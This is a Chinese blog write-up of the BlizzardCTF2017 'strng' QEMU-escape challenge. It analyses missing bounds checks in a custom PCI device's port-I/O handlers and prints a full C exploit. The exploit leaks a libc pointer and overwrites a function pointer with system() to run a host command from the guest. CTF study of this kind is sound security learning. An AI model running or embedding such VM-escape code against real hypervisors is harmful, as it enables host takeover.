【qemu逃逸】BlizzardCTF2017-strng

已于 2023-11-05 01:00:26 修改
阅读量127 收藏
点赞数
分类专栏: # qemu 逃逸 文章标签: qemu逃逸
于 2023-11-02 16:23:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61670993/article/details/134184326
版权

前言

虚拟机用户名:ubuntu

密码:passw0rd

一道入门题,看下启动脚本:

./qemu-system-x86_64 \
    -m 1G \
    -device strng \
    -hda my-disk.img \
    -hdb my-seed.img \
    -nographic \
    -L pc-bios/ \
    -enable-kvm \
    -device e1000,netdev=net0 \
    -netdev user,id=net0,hostfwd=tcp::5555-:22

可以看到加载了 strng 这个设备,并将虚拟机的 22 端口映射到了宿主机的 5555 端口,所以后面可以用如下命令将 exp 传入虚拟机:

scp -P5555 exp ubuntu@127.0.0.1:/home/ubuntu

程序分析

设备定位

直接将 qemu-system-x86_64 丢入 IDA,然后定位到 strng 相关的函数:

从 strng_class_init 函数可以得知 strng 设备的 verdorid = 0x1234,deviceid=0x11E9。然后可以定位到其对应的设备资源:

访问其资源,可以看到存在 resource0 和 resource1 说明其有 mmio 和 pmio 空间(其中从 IDA 里面的函数名也可以看出来):

设备逆向

最主要的就是与 mmio 和 pmio 相关的函数,这里依次看下。这里提前说下,以下函数每次操作的都是下面这个结构体:也就是我们的类实例

strng_mmio_read

这个函数似乎存在溢出,因为其没有对 addr 进行大小检查,所以 addr >> 2 可能造成越界。

strng_mmio_write

函数的功能很简单,也是缺乏对 addr 的大小检查,值得注意的是我的注释部分。

strng_pmio_read

 这里也是没有对 opaque->addr 的大小做检查,如果我们能够控制 opaque->addr 则导致任意读。

  strng_pmio_write

这个函数就很明显了,我们有直接设置 opaque->addr 的能力,配合 pmio_read 可以实现任意读,而结合其自身可以实现任意写。因为该函数也没有对 opaque->addr 的大小做检查。

漏洞分析

- mmio_read 中存在直接越界读

- mmio_write 中存在直接越界写

- pmio_read 与 pmio_write 配合可以实现任意地址读写(不完全任意,应该说越界读写好一些,不想改了)

但是这里需要注意的是 mmio 本身会对地址范围做检查,所以这里第1、2个漏洞无法利用。最后通过 pmio_read 与 pmio_write 实现任意地址读写。

利用方式:

        1、越界读取 regs 后面的 srand/rand/rand_r 函数指针去泄漏 system 函数地址

        2、再回到 strng_mmio_write 函数中:

可以看到在 idx == 3 成立时,会调用 opaque->rand_r,所以可以通过越界读去修改 rand_r 指针为 system 函数地址。

        3、然后之前向 regs[2] 处写入 ”gnome-calculator" 字符串,最后触发即可弹计算机。

exp 如下:

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/io.h>

void * mmio_mem;
size_t pmio_mem = 0xc050;

void mmio_init()
{
        int mmio_fd = open("/sys/devices/pci0000:00/0000:00:03.0/resource0", O_RDWR|O_SYNC);
        if (mmio_fd < 0) perror("[X] open mmio"), exit(EXIT_FAILURE);

        mmio_mem = mmap(0, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, mmio_fd, 0);
        if (mmio_mem < 0) perror("[X] mmap mmio"), exit(EXIT_FAILURE);

        if (mlock(mmio_mem, 0x1000) == -1) perror("[X] mlock mmio"), exit(EXIT_FAILURE);
}

size_t mmio_read(size_t offset)
{
        return *(size_t*)(mmio_mem + offset);
}

size_t mmio_write(size_t offset, size_t value)
{
        *(size_t*)(mmio_mem + offset) = value;
}

void pmio_init()
{
        if (iopl(3) == -1) perror("[X] iopl"), exit(EXIT_FAILURE);
}

size_t pmio_read(size_t offset)
{
        return inl(pmio_mem + offset);
}

void pmio_write(size_t offset, size_t value)
{
        outl(value, pmio_mem + offset);
}

uint64_t arb_read(size_t offset)
{
        pmio_write(0, offset<<2);
        uint64_t val = pmio_read(4);
        pmio_write(0, (offset+1)<<2);
        return val | (1ULL * pmio_read(4) << 32);
}

void arb_write(size_t offset, uint64_t val)
{
        pmio_write(0, offset<<2);
        pmio_write(4, val & 0xffffffff);
        pmio_write(0, (offset+1)<<2);
        pmio_write(4, val >> 32);
}

int main(int argc, char** argv, char** envp)
{
        mmio_init();
        pmio_init();
        uint64_t srand_addr = arb_read(65);
        printf("[+] srand_addr => %#llx\n", srand_addr);
        uint64_t system_addr = srand_addr + 0xacd0;
        printf("[+] system_addr => %#llx\n", system_addr);

        mmio_write(8, 0x6d6f6e67);
        mmio_write(8+4, 0x61632d65);
        //mmio_write(8+4+4, 0x6c75636c);
        //mmio_write(8+4+4+4, 0x726f7461);

        arb_write(4, 0x726f74616c75636c);
        arb_write(69, system_addr);
        mmio_write(8+4, 0xdeadbeef);

        return 0;
}

效果如下:

XiaozaYa
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
qemu逃逸 XNUCA2019-vexx
11-19
附件
qemu逃逸 DefconQuals2018-EC3
11-19
附件
2017 BlizzardCTF pwn strng
yongbaoii的博客
01-26 447
是第一次接触qemu逃逸。 首先要补充一点基本知识。 qemu有几个关键地址。 GVA:guest virtual address(虚拟机中的虚拟地址) GPA:guest physical address(虚拟机中的物理地址) HVA:host virtual address(宿主机中的虚拟地址) HPA: host physical address(宿主机中的物理地址) 转换的顺序也是显而易见的。 GVA-GPA-HVA-HPA 其实GPA只是宿主机mmap出来的一块空间。 这个是可以证明的。 我们先直
Base64类型与Strng类型相互转化
win的小屋
06-27 739
//编码     public string toBase64String(string bytes)     {         byte[] orgStr= Encoding.Default.GetBytes(bytes);         return Convert.ToBase64String(orgStr);     }     //解码     public strin
RISC-V Linux QEMU编译安装 qemu-system-riscv64 构建
flyfish
04-07 1753
qemu-system-riscv64 构建。根据自己机器实际情况进行安装。
QEMU启动x86-Linux内核
许振坪的专栏
03-11 3633
QEMU启动x86-Linux内核
qemu-img命令详解
热门推荐
yuyuyuliang00的博客
03-23 2万+
qemu-img是一个功能强大磁盘镜像管理工具。qemu-img命令使用
qemu 编译 qemu-system-arm 和 qemu-system-aarch64
u011011827的博客
05-30 1307
qemu-6.1.0 ./configure --target-list=arm-softmmu,aarch64-softmmu --prefix=/home/pop/work/qemu/qemu-out2 2>&1 | tee log_configure2.txt make 2>&1 | tee log_build2.txt make install 2>&1 | tee log_install2.txt 编译原因 https://patchwork.
ubuntu 20.04 qemu u-boot-2022.10 开发环境搭建
坚韧与专注
11-08 1719
ubuntu 20.04 qemu u-boot-2022.10 开发环境搭建
教你在QEMU上搭建RISC-V Linux环境
嵌入式Linux充电站
10-16 1544
学习RISC-V Linux搭建环境是第一步,有了环境才能更好的去跟踪源码调试,当然如果有开发板更好。以上是我在qemu上搭建RISC-V Linux的总结,希望对大家有帮助。喜欢的话可以点个关注~微信公众号:嵌入式Linux充电站。
qemu-w64-setup-20220831.exe
09-21
qemu-w64-setup-20220831.exe
qemu-w64-2023082安装包
11-03
qemu-w64-2023082安装包
qemu-aarch64-static挂载文件系统
06-05
制作img镜像共具
关于Windows 9x的vmm32问题解决方法
最新发布
06-15
关于Windows 9x的vmm32问题解决方法
Linux下用sdcc开发51单片机,该示例是中断处理程序.zip
06-15
该资源内项目源码是个人的课程设计、毕业设计,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! ## 项目备注 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 该资源内项目源码是个人的课程设计,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! ## 项目备注 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。
施工作业人员配备与人员资格及职责分工表.docx
06-15
施工作业人员配备与人员资格及职责分工表.docx
Tangram-ES 0.17.1 64位 Debug/Release版 基于OpenGL地图渲染引擎
06-15
Tangram-ES 0.17.1 基于OpenGL ES地图渲染引擎 编译环境为Windows 10 Pro 22H2 + VS2022 + vcpkg 包管理器 编译结果包含64位 Windows平台 Release/Debug版 引擎使用imgui界面库显示地图瓦片,使用OpenGL ES库渲染画面
后端技术详细设计文档模板
06-15
后端技术详细设计文档 目录 1 引言 项目概述 设计目标 2 术语 3 设计概述 3.1 设计理念 3.2 设计方案 3.3 功能范围 4 系统架构 4.1 整体架构 4.2 功能架构 4.3 时序图 5 详细设计 6 数据结构设计 7 任务拆分
qemu-w64-setup-20230822.exe
12-17
qemu-w64-setup-20230822.exe是一个用于安装qemu-w64的可执行文件。QEMU是一个开源的虚拟机监视器和模拟器,用于在计算机上执行各种体系结构的软件。qemu-w64是针对64位Windows系统的QEMU版本。 qemu-w64-setup-20230822.exe是特定日期版本的安装程序,用于将qemu-w64安装到Windows系统中。通过运行这个可执行文件,用户可以方便地安装和配置qemu-w64。 一旦安装完成,用户可以使用qemu-w64来创建虚拟机,并在虚拟环境中运行不同的操作系统和应用程序。qemu-w64支持多个体系结构,包括x86、ARM、PowerPC等,因此用户可以选择在虚拟机中模拟不同的硬件平台。 qemu-w64还提供了丰富的功能和选项,例如虚拟设备的配置、网络设置、磁盘映像的创建和管理等。用户可以根据自己的需求来调整和配置虚拟环境,并与虚拟机进行交互。 总之,qemu-w64-setup-20230822.exe是安装qemu-w64的可执行文件,它提供了在64位Windows系统上运行虚拟机的功能,让用户可以轻松地模拟多个操作系统和体系结构。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值